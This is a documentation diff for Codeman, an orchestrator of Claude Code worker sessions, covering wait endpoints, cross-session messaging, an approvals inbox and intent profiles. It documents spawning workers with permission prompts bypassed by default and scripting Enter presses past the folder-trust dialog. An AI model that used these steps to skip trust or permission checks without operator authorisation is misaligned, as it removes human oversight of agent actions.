| Tests | `test/agent-skill.test.ts` (10 unit), `test/quick-start.test.ts` (real server: default-off, PUT accepts key, injection on create, shell-mode skipped) |
|
||||
|
||||
Decisions worth keeping:
|
||||
|
||||
- **Ownership marker, prefix-matched.** The injected SKILL.md ends with
|
||||
`<!-- codeman-managed-agent-skill: … -->`; install/refresh/remove all refuse a copy
|
||||
without the marker (a user's own skill) and match on the PREFIX so a wording change
|
||||
cannot disown older injected copies (the `BACKGROUND_WAKE_MARKER_PREFIX` pattern).
|
||||
- **Symlink refusal.** This repo's own dogfooding layout
|
||||
(`.claude/skills/codeman -> ../../skills/codeman`) means the injector must `lstat`
|
||||
the skill dir AND its `skills/` parent and bail on a symlink, or enabling the
|
||||
setting in the Codeman repo itself would overwrite the skill source through the link.
|
||||
- **ADD-ONLY at session create**, same shared-`.claude` rationale as the statusLine:
|
||||
a create while the setting is off must not yank the skill out from under other live
|
||||
sessions in the repo. The remove path exists (CLI `skill uninstall`, tests); no
|
||||
automatic sweep removes on toggle-off.
|
||||
- **Removal is manifest-based, never `rm -rf`**: only files the packaged source would
|
||||
have written are deleted, directories are pruned bottom-up only if they emptied, so
|
||||
a user's extra notes in `reference/` survive an uninstall.
|
||||
- **Source resolution**: `join(moduleDir, '..', 'skills', 'codeman')` works from
|
||||
`src/` (tsx), `dist/` (tsc build), and the npm tarball alike, because all three sit
|
||||
one level below the package root and `files` ships `skills/`.
|
||||
- **Nothing acts on the setting at PUT time**: injection reads the merged persisted
|
||||
settings at session create (`readSettings`, ~2s cache), so the partial-PUT invariant
|
||||
(`toggleService` reading `merged`) is untouched by construction.
|
||||
|
||||
### 2026-08-09 addendum: cross-session messaging folded into the skill
|
||||
|
||||
Claude Code 2.1.224+ ships cross-session messaging: `ListAgents`/`SendMessage`
|
||||
tools, a per-session Unix inbox socket, and a registry in
|
||||
`~/.claude/sessions/<pid>.json`. Codeman's claude workers are ordinary local Claude
|
||||
Code sessions, so the skill now routes task delivery and result collection over it
|
||||
when available, while the HTTP primitives keep spawn, readiness, synchronization,
|
||||
liveness and delete. New `skills/codeman/reference/messaging.md` (ships with zero
|
||||
installer changes: `readAgentSkillSource()` enumerates `reference/*.md` from disk),
|
||||
Flow 5 in recipes.md, and §4 in SKILL.md.
|
||||
|
||||
Verified live (claude-cli 2.1.226, Linux):
|
||||
|
||||
- A message to an idle worker starts a turn and that turn fires the normal `stop`
|
||||
hook (8.3 s send-to-stop measured), so the HTTP wait primitives compose with
|
||||
messaging unchanged; delivery to a busy session lands between tool calls.
|
||||
- First contact needs the `name [ref]` form; the bare name errors with the exact
|
||||
string to resend. The `uds:` reply address of an inbound message works as a `to`.
|
||||
- The `tmux codeman-<id8>` column in `ListAgents` (and the registry's `tmux` field)
|
||||
is the join key to Codeman session ids. The registry's `sessionId` field starts as
|
||||
the Codeman id (we spawn `claude --session-id <id>`) but drifts after `/clear` or
|
||||
resume, so it must never be the join key.
|
||||
- The feature is flag-gated beyond the version: two 2.1.226 sessions on one machine,
|
||||
one with an inbox socket and one without. Absence is a fallback case, not an error.
|
||||
- Codeman's default `--dangerously-skip-permissions` spawn puts both ends in the
|
||||
bypassing class, which delivers; mixed classes hold behind an approval dialog that
|
||||
expires unattended (upstream default 5 min), which on a headless worker means the
|
||||
message silently dies. The skill's backstop covers it.
|
||||
|
||||
Follow-up, landed in the same PR: local claude spawns now pass
|
||||
`--name <session name>` so peers carry Codeman session names. The gate is
|
||||
`buildNameCliArgs()` (session-cli-builder.ts), fail-closed at
|
||||
`CLAUDE_NAME_FLAG_MIN_VERSION = 2.1.224`: that is the messaging release, the flag's
|
||||
presence there was verified against the installed 2.1.224 binary, and the version
|
||||
comes from `getClaudeCliVersion()` (null on probe failure and under vitest), so an
|
||||
older or unknown CLI gets a command byte-identical to before. That matters because
|
||||
claude aborts startup on an unknown option, which would kill every session spawn.
|
||||
The value is allowlist-sanitized (Unicode letters/digits plus ` ._:-`, leading
|
||||
dashes stripped so it cannot parse as another option, 64-char cap, empty result =
|
||||
flag omitted) before the double-quoted interpolation in `buildSpawnCommand`, and
|
||||
only the LOCAL command carries it: the docker/remote builders never see it, since
|
||||
their CLI is not the binary the probe measured. E2E on an isolated instance
|
||||
(`CODEMAN_INSTANCE`): process cmdline `claude ... --name w9-msgtest`, registry
|
||||
`name: "w9-msgtest"`, `ListAgents` lists it under that name, a message round-trip
|
||||
works, and its replies arrive tagged `from-name="w9-msgtest"` (a derived-name
|
||||
worker's replies carry no `from-name`). A quick-start without `sessionName` has an
|
||||
empty Codeman name, so the peer name stays derived: agents should name their
|
||||
workers. Tests: `test/name-flag-injection.test.ts`.
|
||||
@@ -46,6 +46,20 @@ payload return `{ "success": true, "data": {} }`.
|
||||
> `GET /api/screenshots/:name`, `GET /q/:code` (QR redirect), and the
|
||||
> `GET /ws/sessions/:id/terminal` WebSocket upgrade.
|
||||
|
||||
> The [agent wait endpoints](#long-polling-agent-wait) use the normal envelope but
|
||||
> are the only JSON endpoints that deliberately **hold the connection open**, for up
|
||||
> to 600 s. Proxy operators and HTTP clients with a global read timeout need to know
|
||||
> that before pointing them at Codeman.
|
||||
|
||||
⚠️ **A `401` is the one status that is not an envelope.** Authentication is rejected
|
||||
in a request hook, before any handler runs, and it replies with the bare string
|
||||
`Unauthorized` (`Unauthorized: hook secret required` on the hook path) plus
|
||||
`WWW-Authenticate: Basic realm="Codeman"`. There is no `success`, no `error`, and no
|
||||
`errorCode`, because the wrapping hook only wraps object payloads. So a client that
|
||||
pipes every response straight into a JSON parser dies with a parse error rather than
|
||||
reporting an auth failure, which is a confusing way to discover that a password is
|
||||
set. Branch on the HTTP status **before** parsing.
|
||||
|
||||
## Error codes → HTTP status
|
||||
|
||||
The single source of truth is `ErrorStatus` / `httpStatusForErrorCode()` in
|
||||
@@ -66,6 +80,419 @@ the HTTP status.
|
||||
|
||||
Adding a new error code is non-breaking; removing or renaming one is a major change.
|
||||
|
||||
## Long-polling (agent wait)
|
||||
|
||||
Three calls block until something happens instead of answering immediately. They
|
||||
exist because SSE is Codeman's only other "tell me when" channel, and an agent
|
||||
driving the API from a shell tool cannot practically hold a stream and parse
|
||||
events inline.
|
||||
|
||||
| Call | Blocks until |
|
||||
|------|--------------|
|
||||
| `GET /api/v1/sessions/:id/wait` | one of a set of lifecycle signals fires |
|
||||
| `GET /api/v1/sessions/:id/wait-output` | a literal string appears in the session's output |
|
||||
| `POST /api/v1/sessions/:id/input` with `wait` | the input is delivered **and then** a signal fires |
|
||||
|
||||
`POST .../input` with `wait` is not the same as a `POST` followed by a separate
|
||||
`GET .../wait`. It registers the waiter **before** writing, which closes the window
|
||||
in which a separate wait sees the session still idle from the previous turn and
|
||||
answers instantly with the wrong turn's result. Use it whenever you send a prompt
|
||||
and want to know when that prompt is done.
|
||||
|
||||
### Three semantics that break callers who assume otherwise
|
||||
|
||||
**1. A timeout is HTTP `200`, not an error.** A wait that ends without its signal
|
||||
returns `{"success":true, ...,"wait":{"timedOut":true,"signal":null}}`. The
|
||||
intended pattern is a client-side loop over short waits, because `tailscale serve`
|
||||
and cloudflared can both cut an idle connection, and turning every poll boundary
|
||||
into a `4xx` would make that loop indistinguishable from a real failure. `408` is
|
||||
auto-retried by several clients (silently doubling the polling load), `504` is what
|
||||
a genuine tunnel failure looks like, and `204` cannot carry `waitedMs` / `status` /
|
||||
`limitPaused`. Reserve error handling for the four codes in the table below.
|
||||
|
||||
**2. `stop` and `blocked` fire only for `claude` sessions.** Both come from Claude
|
||||
Code hooks, and no other mode installs them: `shell` runs no agent, and the external
|
||||
CLIs (`opencode`, `codex`, `gemini`, `antigravity`) render their own TUIs and post
|
||||
no hooks. For every non-`claude` mode only `idle`, `working` and `exit` are
|
||||
accepted, and of those only `exit` is dependable: see the caveats under
|
||||
[Signals](#signals) before building on `idle`. Requesting `stop` or `blocked`
|
||||
**explicitly** on such a session is a
|
||||
`400`; omitting `until` never fails, the server just drops them from the default set
|
||||
and echoes the narrowed set back as `wait.until`. Three more places hooks can go
|
||||
missing even in `claude` mode: a **Docker case** needs
|
||||
`CODEMAN_DOCKER_BRIDGE_HOOKS=1`, since a container cannot reach a loopback-bound
|
||||
Codeman (without it, only `idle` / `working` / `exit` work); a **remote-SSH
|
||||
case** runs the agent on another host, whose hooks may never reach this server at
|
||||
all; and a case whose hook config was written by **Codeman < 1.13.0 against an
|
||||
`--https` install** carries hook curls without `-k`, which TLS-fail silently (the
|
||||
hook line ends in `|| true`). Codeman now writes `curl -sk` and repairs a stale
|
||||
case config the next time a session starts in that case. When in doubt, ask for
|
||||
`stop,idle,exit` so a session without hooks still resolves on the heuristic
|
||||
signal.
|
||||
|
||||
**3. `from=now` does not mean "printed after you asked".** tmux repaints the visible
|
||||
screen on attach, on resize, and on any TUI redraw, and a repaint arrives as
|
||||
ordinary output, so text that was already on screen can satisfy a fresh wait. This
|
||||
was observed live: a marker echoed a minute earlier matched instantly on a new
|
||||
`from=now` wait. It is inherent to running the agent under a multiplexer, so the
|
||||
contract is a **marker unique to each call** (`MARK="DONE_$RANDOM"`, send
|
||||
`echo $MARK`, then wait on `$MARK`), never a generic string like `BUILD OK`.
|
||||
|
||||
### Signals
|
||||
|
||||
| Signal | Source | Actually fires for |
|
||||
|--------|--------|--------------------|
|
||||
| `idle` | the session's own `idle` event | `claude`: yes, on ❯-prompt detection after activity. `shell`: **once only**, ~500 ms after start, and never again. External CLIs: not guaranteed (they render their own TUIs and readiness is output stabilization) |
|
||||
| `working` | the session's own `working` event | `claude` only in practice (spinner and work-keyword detection are Claude output formats) |
|
||||
| `stop` | the Claude Code `stop` hook, the definitive end-of-turn signal | `claude` only |
|
||||
| `blocked` | a `permission_prompt` or `elicitation_dialog` hook | `claude` only, and rarer than it looks: see below |
|
||||
| `exit` | no process is behind the session | every mode |
|
||||
|
||||
`stop` is the signal to orchestrate on where it exists; `idle` is a heuristic
|
||||
fallback that can flap mid-turn when a spinner pauses. The default set when `until`
|
||||
is omitted is `stop,idle,exit` (`exit` is in there so a worker that crashes resolves
|
||||
the wait promptly instead of burning the caller's whole timeout on something that
|
||||
can no longer happen). On a `claude` worker, prefer an explicit `until=stop,exit`
|
||||
once the session is up: the default set's `idle` also resolves on a spinner pause,
|
||||
and on a fresh session the **startup** `idle` (emitted when the CLI first comes up)
|
||||
can land inside your first wait window and report a turn that never ran. Measured:
|
||||
a session parked on the trust dialog emits no *further* `idle`, so it is the
|
||||
startup transition, not the dialog, that produces the false success below.
|
||||
|
||||
⚠️ **`exit` means "nothing is running", which includes "not started yet".** The
|
||||
server answers from `pid === null` plus a mux-layer pane-death probe, and that
|
||||
covers a session that exited — including a worker that died *inside* its tmux pane
|
||||
while the local attach client (and therefore `pid`) lives on — one that was
|
||||
detached, and one that was **created but never started**. So the first wait
|
||||
after `POST /api/v1/sessions` returns `{"signal":"exit","immediate":true}` in
|
||||
milliseconds, and reading that as "the worker died" is wrong: it means start it, or
|
||||
wait for it to come up. `status` is carried alongside so nothing is hidden. The
|
||||
alternative (trusting `status`) is worse, because a dead PTY parks the session at
|
||||
`status: "idle"`, which would answer the default wait with `immediate: true` for a
|
||||
worker that has crashed. A worker dying while a wait is parked resolves it within
|
||||
a few seconds (a background death-watcher), not at the timeout.
|
||||
|
||||
⚠️ **`blocked` is reachable less often than the table suggests.** It fires on two
|
||||
hooks, and the default configuration suppresses one of them: Codeman spawns claude
|
||||
with `--dangerously-skip-permissions`, so permission prompts do not happen unless the
|
||||
instance is switched to the `auto` Claude mode (App Settings), or the caller is a
|
||||
multi-user account without the bypass grant, which is forced to `--permission-mode
|
||||
auto`. What does still fire under the default is `elicitation_dialog`, the agent
|
||||
asking the user a question. So `until=stop,blocked,exit` is a reasonable belt on a
|
||||
long turn, but a worker that never comes back is far more likely to be working than
|
||||
blocked, and polling `blocked` alone will sit at its timeout.
|
||||
|
||||
⚠️ **On a `shell` session, only `exit` and marker-matching are dependable.** A shell
|
||||
session emits its one `idle` at startup and then stays `status: "idle"` forever,
|
||||
whatever the pane is doing, so it never emits a *transition*. Since send-and-wait
|
||||
requires a transition (and so does `fresh=1`), both can only time out there:
|
||||
a documented default `wait` on a shell worker running `sleep 4` times out at the
|
||||
full 25 s. Synchronize hook-less sessions with `wait-output` and a unique marker
|
||||
instead. The same caution applies to the external CLIs.
|
||||
|
||||
### Readiness is not a signal
|
||||
|
||||
Nothing here reports "the agent is ready for a prompt", and no combination of
|
||||
`until`/`fresh` synthesizes one. A freshly created session reads as `exit` (above),
|
||||
and a `claude` worker in a brand-new case comes up on the CLI's **trust dialog**,
|
||||
which contains a ❯ prompt of its own. Send-and-wait posted at that moment types the
|
||||
prompt into the dialog, where the `\r` never gets past it, while the session's
|
||||
startup `idle` lands inside the wait window: the wait resolves on `idle` in a
|
||||
couple of seconds with `timedOut: false`, which looks exactly like a completed
|
||||
turn.
|
||||
|
||||
The reliable sequence is: poll `GET /api/v1/sessions/:id` until `.data.pid` is
|
||||
non-null, then `wait-output` for the composer's own marker (`bypass`, the status
|
||||
bar of a CLI spawned in bypass mode) with a short timeout, handling the trust
|
||||
dialog only as the bounded fallback (`trust` matched → send `\r` → wait for
|
||||
`bypass` again). Do not probe `trust` first and Enter blindly: the dialog text
|
||||
stays in the terminal buffer for the life of the session, so a `trust` probe with
|
||||
`from=buffer` keeps matching on every later run and the Enter lands in a ready
|
||||
composer. A worked version is in
|
||||
[`extending-codeman.md`](extending-codeman.md#seam-3-http-api-and-cli).
|
||||
|
||||
### `GET /api/v1/sessions/:id/wait`
|
||||
|
||||
| Param | Type | Default | Notes |
|
||||
|-------|------|---------|-------|
|
||||
| `until` | comma-separated list of `idle,working,stop,blocked,exit` | `stop,idle,exit` | resolves on the first to fire. An unknown token is a `400` naming it, never a silent fallback |
|
||||
| `timeout` | positive integer ms | `60000` | **validated first, clamped second.** `0`, a negative value and a fractional value are all `400`s, not clamps; a valid value outside `[1000, 600000]` is clamped and echoed as `wait.timeoutMs` |
|
||||
| `fresh` | `0` \| `1` \| `false` \| `true` | `0` | `1` requires an actual transition, ignoring the state at call time |
|
||||
|
||||
```bash
|
||||
curl -s "$API/api/v1/sessions/$SID/wait?until=stop,exit&timeout=60000"
|
||||
```
|
||||
|
||||
Both GET wait routes answer with `Cache-Control: no-store`, because the documented
|
||||
pattern polls one identical URL in a loop and a cached `{"timedOut":true}` would
|
||||
turn that loop into a busy spin. `POST .../input` sends no cache header (it is a
|
||||
POST, which is not heuristically cacheable).
|
||||
|
||||
⚠️ **Unknown query parameters are ignored, not rejected**, with one exception
|
||||
(`regex`, below). In particular `match=` on `/wait` is silently dropped and you get
|
||||
a plain signal wait, so check the endpoint path before blaming the parameters.
|
||||
|
||||
### `GET /api/v1/sessions/:id/wait-output`
|
||||
|
||||
| Param | Type | Default | Notes |
|
||||
|-------|------|---------|-------|
|
||||
| `match` | literal string, 1 to 200 chars | required | substring match against the PTY stream with ANSI escapes stripped. A match spanning two PTY chunks is found |
|
||||
| `nocase` | `0` \| `1` \| `false` \| `true` | `0` | case-insensitive compare. The returned snippet keeps the terminal's original casing |
|
||||
| `from` | `now` \| `buffer` | `now` | `buffer` scans the tail of the existing terminal buffer (bounded, 256 KB by default) before blocking |
|
||||
| `timeout` | positive integer ms | `60000` | same validation and clamp as `/wait` |
|
||||
|
||||
**Matching is literal, never a pattern.** A `regex` parameter is rejected with a
|
||||
`400` rather than ignored, so a caller that assumed otherwise finds out immediately
|
||||
instead of waiting on the wrong thing. The reasoning is in
|
||||
[`architecture-invariants.md`](architecture-invariants.md#agent-wait-primitives).
|
||||
|
||||
#### What the matcher actually sees
|
||||
|
||||
The matcher scans the raw PTY stream, **normalized**: ANSI escape sequences are
|
||||
stripped — CSI, OSC, and the charset-designation escapes a stock bash prompt emits
|
||||
on every line (`ESC ( B`), so `match=tnode:` matches a prompt that renders
|
||||
`…@tnode:` — a partial escape arriving at a chunk boundary is held back until its
|
||||
tail arrives, and a match may straddle PTY chunks: `printf STRAD; sleep 1; printf
|
||||
DLEQQ` is matchable as `STRADDLEQQ` (all measured live). Three caveats remain:
|
||||
|
||||
⚠️ **It is still the byte stream, not the rendered pane.** `GET .../terminal`
|
||||
answers from a tmux screen capture (`data.source: "mux-visible"`), the finished
|
||||
picture; the matcher sees the stream that painted it. For linear output the two
|
||||
agree once escapes are stripped, but a full-screen TUI composes its picture with
|
||||
cursor positioning, so what the pane shows and what the stream carries can differ.
|
||||
Seeing your string in `terminal?tail=` makes a match likely, not guaranteed.
|
||||
|
||||
⚠️ **A TUI's text can arrive without its spaces.** Claude Code positions words
|
||||
with cursor moves rather than printing spaces, so screen text can reach the
|
||||
matcher as `Quicksafetycheck:Isthisaprojectyoucreated...`. Whether a given phrase
|
||||
keeps its spaces depends on how the TUI happened to draw it (measured: `I trust
|
||||
this folder` matched, `Quick safety check` did not), so a multi-word `match`
|
||||
against a TUI pane is unreliable rather than impossible. Match a **single
|
||||
space-free token**, ideally one you printed yourself. Plain command output (a
|
||||
shell worker, an `echo`) keeps its spaces.
|
||||
|
||||
⚠️ **The returned `snippet` is a rendering of the matched text, not a quotation of
|
||||
it.** It is cut from the same normalized stream the match ran against, then
|
||||
cleaned for display: remaining raw control bytes are removed (an agent pipes the
|
||||
snippet into its own terminal, so a worker's bytes must not be able to reset that
|
||||
display) and blank runs are collapsed. A printable needle that matched will appear
|
||||
in it; a needle containing control bytes or a blank run may not survive verbatim.
|
||||
|
||||
```bash
|
||||
MARK="DONE_$RANDOM"
|
||||
curl -sG "$API/api/v1/sessions/$SID/wait-output" \
|
||||
--data-urlencode "match=$MARK" --data-urlencode 'timeout=120000'
|
||||
```
|
||||
|
||||
Build the query with `-G --data-urlencode` rather than by hand: a `+` in a
|
||||
hand-written query string decodes to a space.
|
||||
|
||||
### `POST /api/v1/sessions/:id/input` with `wait`
|
||||
|
||||
Two optional fields on the existing endpoint:
|
||||
|
||||
| Field | Type | Notes |
|
||||
|-------|------|-------|
|
||||
| `wait` | `true` or the same comma grammar as `until` | `true` means the default signal set. Omitted keeps the historical fire-and-forget behavior, unchanged. `null`, `false` and an empty string are all read as **absent**, not as an error and not as "wait for the default" |
|
||||
| `waitTimeout` | positive integer ms | same validation **and** clamp as `timeout`: `0`, a negative and a fractional value are `400`s, anything valid is clamped into `[1000, 600000]` and echoed as `wait.timeoutMs` |
|
||||
|
||||
Both are `nullish`, so an explicit `null` from `JSON.stringify` is accepted as
|
||||
"absent" rather than failing validation. That is deliberate: `.optional()` would
|
||||
reject it, which has shipped as a real bug twice.
|
||||
|
||||
The input must end with `\r` (a real carriage return in the JSON string): Enter is
|
||||
sent only when the input contains one, so text without it is typed onto the
|
||||
worker's prompt but never submitted, and the wait then runs its full timeout on a
|
||||
turn that never started. Verified live; this is the most common silent failure on
|
||||
this endpoint.
|
||||
|
||||
```bash
|
||||
curl -s -X POST "$API/api/v1/sessions/$SID/input" \
|
||||
-H 'Content-Type: application/json' \
|
||||
-d '{"input":"run the tests\r","useMux":true,"clientId":"agent-1","seq":1,
|
||||
"wait":"stop","waitTimeout":600000}'
|
||||
```
|
||||
|
||||
A **tagged duplicate** (a `clientId` + `seq` pair the server has already applied)
|
||||
still honors `wait`, because the caller's question is unanswered, but it answers
|
||||
from the session's current state rather than requiring a new transition: the
|
||||
original turn may be long over. It comes back as
|
||||
`"delivered": false, "duplicate": true`.
|
||||
|
||||
### Response
|
||||
|
||||
All three nest the wait result under `data.wait`, so one client helper works against
|
||||
any of them:
|
||||
|
||||
```json
|
||||
{ "success": true, "data": {
|
||||
"sessionId": "28325fd3-caa7-4178-82bf-87dfebf0f464",
|
||||
"status": "idle",
|
||||
"limitPaused": false,
|
||||
"wait": {
|
||||
"signal": "stop", "until": ["stop", "idle", "exit"],
|
||||
"timedOut": false, "immediate": false, "ended": false, "aborted": false,
|
||||
"waitedMs": 8421, "timeoutMs": 60000
|
||||
}
|
||||
}}
|
||||
```
|
||||
|
||||
`POST .../input` returns the same `wait` object alongside `delivered`, `duplicate`,
|
||||
`status` and `limitPaused`. `POST .../input` **without** `wait` is unchanged and
|
||||
still returns `{"success": true, "data": {}}`.
|
||||
|
||||
⚠️ `delivered: false` has **two** meanings, and they must be told apart by
|
||||
`duplicate`: with `duplicate: true` the input was suppressed as an already-applied
|
||||
redelivery (harmless, the turn it refers to may be long over), while with
|
||||
`duplicate: false` the **write failed** (typically no PTY behind the session). A
|
||||
client that reads `delivered === false` as "duplicate" silently treats a failed send
|
||||
as a success.
|
||||
|
||||
| Field | Type | Meaning |
|
||||
|-------|------|---------|
|
||||
| `wait.signal` | signal \| `null` | the signal that fired (`/wait` and `/input` only) |
|
||||
| `wait.until` | array of signals | what the server actually waited on, after narrowing the default set for the session's mode (`/wait` and `/input` only) |
|
||||
| `wait.matched` | boolean | the string appeared (`/wait-output` only) |
|
||||
| `wait.match` | string | the literal that was searched for (`/wait-output` only) |
|
||||
| `wait.snippet` | string \| `null` | bounded window of output around the match, blank runs collapsed for readability (`/wait-output` only) |
|
||||
| `wait.timedOut` | boolean | the wait hit its timeout. Still a `200` |
|
||||
| `wait.immediate` | boolean | the condition already held at call time, so nothing was waited for (`waitedMs` is 0) |
|
||||
| `wait.ended` | boolean | the session went away (deleted or torn down) before the condition was met |
|
||||
| `wait.aborted` | boolean | the client hung up, so the waiter was released without resolving — and by that definition a client never reads `true`. When the **server** abandons a wait itself (send-and-wait against a session with no PTY), it answers in about a millisecond with `ended: true`, `delivered: false`, `duplicate: false` and `aborted: false`: `delivered`/`ended` carry that story, and `aborted` stays the transport flag. Present for completeness; treat a `true` as "this wait answered nothing", never as an outcome |
|
||||
| `wait.waitedMs` | number | wall-clock ms actually spent waiting |
|
||||
| `wait.timeoutMs` | number | the timeout **after clamping**, which is what was applied |
|
||||
| `status` | `SessionStatus` | the session's status after the wait, so a caller that timed out still learns where things stand |
|
||||
| `limitPaused` | boolean | the session is paused on a usage limit and will emit nothing until its reset, so a timeout here is expected rather than a stall worth retrying hard |
|
||||
|
||||
Read the outcome by discriminator, in this order:
|
||||
|
||||
1. `wait.signal !== null` (or `wait.matched === true`): the thing happened.
|
||||
2. `wait.timedOut`: a poll boundary. Loop again.
|
||||
3. `wait.ended` or `wait.aborted`: the wait answered nothing, because the session is
|
||||
gone or was never running. Re-check the session instead of looping.
|
||||
|
||||
`wait.immediate` is not a fourth outcome: it rides along with the first one and
|
||||
means the condition already held at call time, so nothing was actually waited for.
|
||||
If that is not what you meant, you wanted `fresh=1` or the send-and-wait form. Note
|
||||
that `{"signal":"exit","immediate":true}` on a session you just created is the
|
||||
not-started-yet case, not a crash.
|
||||
|
||||
**The timeout is clamped, so read it back.** A request for 1800000 ms is silently
|
||||
reduced to the server's ceiling (600000 ms by default, operator-tunable), and a
|
||||
request for 1 ms is raised to 1000 ms. `wait.timeoutMs` is the value that was
|
||||
applied. Without checking it, a caller that asked for 30 minutes and got 10 will
|
||||
read the timeout as "the worker is wedged" and kill a session that was working fine.
|
||||
|
||||
### Errors
|
||||
|
||||
| `errorCode` | HTTP | When |
|
||||
|-------------|------|------|
|
||||
| `INVALID_INPUT` | 400 | unknown `until` / `wait` token; `stop` or `blocked` requested explicitly on a mode that installs no hooks (the message names the mode); `regex=` on `/wait-output`; `match` outside 1 to 200 chars; a non-numeric `timeout` |
|
||||
| `NOT_FOUND` | 404 | no such session, or one this caller does not own |
|
||||
| `SESSION_BUSY` | 409 | this session's waiter cap is full |
|
||||
| `RATE_LIMITED` | 429 | a per-owner or process-wide waiter cap is full. Retry later; the session you named is not the problem |
|
||||
|
||||
The two capacity codes are deliberately different. A process-wide cap reported as
|
||||
`SESSION_BUSY` would tell the caller to switch sessions, which cannot help. The
|
||||
error message names the cap that was hit.
|
||||
|
||||
⚠️ A `401` is **not** in this table and is not an envelope at all (see
|
||||
[Response envelope](#response-envelope)). It matters most here: a polling loop that
|
||||
pipes each wait straight into `jq` fails with a parse error on every iteration
|
||||
against a password-protected server, which reads as "the wait endpoints are broken".
|
||||
Check the status first.
|
||||
|
||||
The per-session cap is a **combined** budget: signal waiters and output waiters
|
||||
count against the same 16, not 16 of each. An abandoned request no longer holds its
|
||||
slot, because the routes release the waiter when the client disconnects, but a
|
||||
client that opens many concurrent waits against one session will still hit the cap.
|
||||
|
||||
## Approvals Inbox
|
||||
|
||||
Cross-session queue of prompts waiting on a human (permission dialogs,
|
||||
AskUserQuestion questions, idle prompts). Claude-mode sessions only; items are
|
||||
in-memory (a server restart drops them; the next prompt re-fires the hook).
|
||||
Design: [`approvals-inbox-plan.md`](approvals-inbox-plan.md).
|
||||
|
||||
- `GET /api/v1/approvals` → `{ approvals: ApprovalItem[] }`, oldest first,
|
||||
ownership-scoped in multi-user mode. `ApprovalItem`: `{ id, sessionId,
|
||||
sessionName, kind: 'permission'|'question'|'idle', createdAt, toolName?,
|
||||
toolSummary?, message?, cwd?, context?, options?: {n, label}[] }`. `context`
|
||||
is the ANSI-stripped visible pane frame; `options` is present only when the
|
||||
dialog's numbered choices parsed confidently.
|
||||
- `POST /api/v1/approvals/:id/answer` with `{ action: 'approve' }` (sends the
|
||||
digit `1`), `{ action: 'deny' }` (sends Esc), `{ action: 'option', option: n }`
|
||||
(sends the digit; accepted only when `n` is among the item's parsed
|
||||
`options`), or `{ action: 'text', text }` (idle prompts only; submits the
|
||||
line as a prompt). `404 NOT_FOUND` when the item is no longer pending,
|
||||
`409 CONFLICT` when the dialog left the screen or another actor answered
|
||||
first, `422 OPERATION_FAILED` when the session refused input.
|
||||
- `POST /api/v1/approvals/:id/dismiss` removes the item without keystrokes.
|
||||
|
||||
SSE events: `approval:pending` (full item), `approval:updated` (context/options
|
||||
re-captured), `approval:resolved` (`{ id, sessionId, kind, resolution }` with
|
||||
`resolution` one of `answered | resolved_in_terminal | superseded |
|
||||
session_ended | dismissed | expired`).
|
||||
|
||||
## Read My Mind intent profiles
|
||||
|
||||
Per-case profiles of what the user is trying to accomplish: user/agent-stated
|
||||
goals plus the user's recently submitted prompts, captured from the Claude
|
||||
session transcript while the opt-in `readMyMindEnabled` setting is on (default
|
||||
OFF). Keyed by owner + workingDir, so the profile survives `/clear`, respawns,
|
||||
and session churn. Stored in `~/.codeman/intents.json` (mode 0600); never fed
|
||||
into `/api/v1/search`. Design: [`readmymind-plan.md`](readmymind-plan.md);
|
||||
user guide: [`readmymind.md`](readmymind.md).
|
||||
|
||||
- `GET /api/v1/sessions/:id/intent` -> `{ intent: IntentProfile }` for the
|
||||
session's case. `IntentProfile`: `{ key, workingDir, updatedAt, goals,
|
||||
recentPrompts: { ts, sessionId, text }[] }` (prompts oldest first, FIFO cap
|
||||
50, each <= 500 chars). A case with nothing recorded answers an empty
|
||||
profile with `updatedAt: 0`; nothing is persisted by reads.
|
||||
- `PUT /api/v1/sessions/:id/intent` with `{ goals }` (<= 8192 chars, strict
|
||||
schema) replaces the goals text and answers the updated profile.
|
||||
`400 INVALID_INPUT` on over-long or unknown fields.
|
||||
- `DELETE /api/v1/sessions/:id/intent` -> `{ deleted: boolean }` forgets the
|
||||
case's profile entirely.
|
||||
- `POST /api/v1/sessions/:id/readmymind` predicts the user's next prompt:
|
||||
a one-shot model call over the intent profile plus live session signals
|
||||
(pending approval dialog, transcript tail, git state, run-summary events,
|
||||
sibling sessions). Body is optional; the rethink flow passes
|
||||
`{ steer?, rejected? }` (strict schema: `steer` <= 2000 chars, `rejected`
|
||||
up to 10 strings <= 1000 chars). Answers
|
||||
`{ suggestions: { prompt, why, kind }[], durationMs }` with 1-3 suggestions
|
||||
(`kind`: `continue` | `verify` | `redirect`; prompts are single-line).
|
||||
Claude-mode sessions only (`400 INVALID_INPUT` otherwise); one prediction in
|
||||
flight per session (`409 CONFLICT`); predictor failures answer
|
||||
`502 OPERATION_FAILED`. Takes 5-90 s and costs real tokens. Suggestions are
|
||||
only ever returned, never sent: submitting one is the caller's explicit act.
|
||||
|
||||
All four enforce session ownership in multi-user mode; a foreign session id
|
||||
answers `404 NOT_FOUND` (no existence leak), and profiles of two owners of the
|
||||
same directory are distinct by construction.
|
||||
|
||||
## Voice dictation
|
||||
|
||||
Browser dictation transcribed through this server's Claude Code login, i.e. the
|
||||
same speech-to-text service the CLI's own `/voice` mode uses. Gated on the synced
|
||||
`claudeVoiceEnabled` setting (default OFF). Design:
|
||||
[`claude-voice-plan.md`](claude-voice-plan.md).
|
||||
|
||||
- `GET /api/v1/voice/status` -> `{ available, reason?, subscriptionType?,
|
||||
expiresAt? }`. `reason` is `disabled` (setting off), `no-credentials` (nobody
|
||||
signed in to Claude Code on the server), `expired` (the access token elapsed;
|
||||
running any Claude session refreshes it) or `malformed`. The OAuth token
|
||||
itself is never returned by this or any other endpoint.
|
||||
- `GET /ws/voice/stream?language=&keyterms=` (WebSocket, not under `/api`)
|
||||
relays one dictation. Client sends binary frames of signed 16-bit
|
||||
little-endian PCM, 16 kHz mono (<= 64 KB per frame), plus JSON control frames
|
||||
`{"t":"finalize"}` (ask for the final transcript) and `{"t":"stop"}`. Server
|
||||
sends `{"t":"ready"}`, `{"t":"transcript","text","final"}` (each frame is the
|
||||
WHOLE running transcript, not a delta), `{"t":"error","message"}` and
|
||||
`{"t":"closed"}`. Close codes: `4003` disallowed Host/Origin, `4004`
|
||||
unavailable (reason in the close reason), `4008` too many concurrent streams.
|
||||
Streams are capped in count and length (`src/config/voice.ts`).
|
||||
|
||||
## Authentication
|
||||
|
||||
Optional HTTP Basic (`CODEMAN_USERNAME`/`CODEMAN_PASSWORD`) → opaque
|
||||
|
||||
@@ -0,0 +1,106 @@
|
||||
# Approvals Inbox (design)
|
||||
|
||||
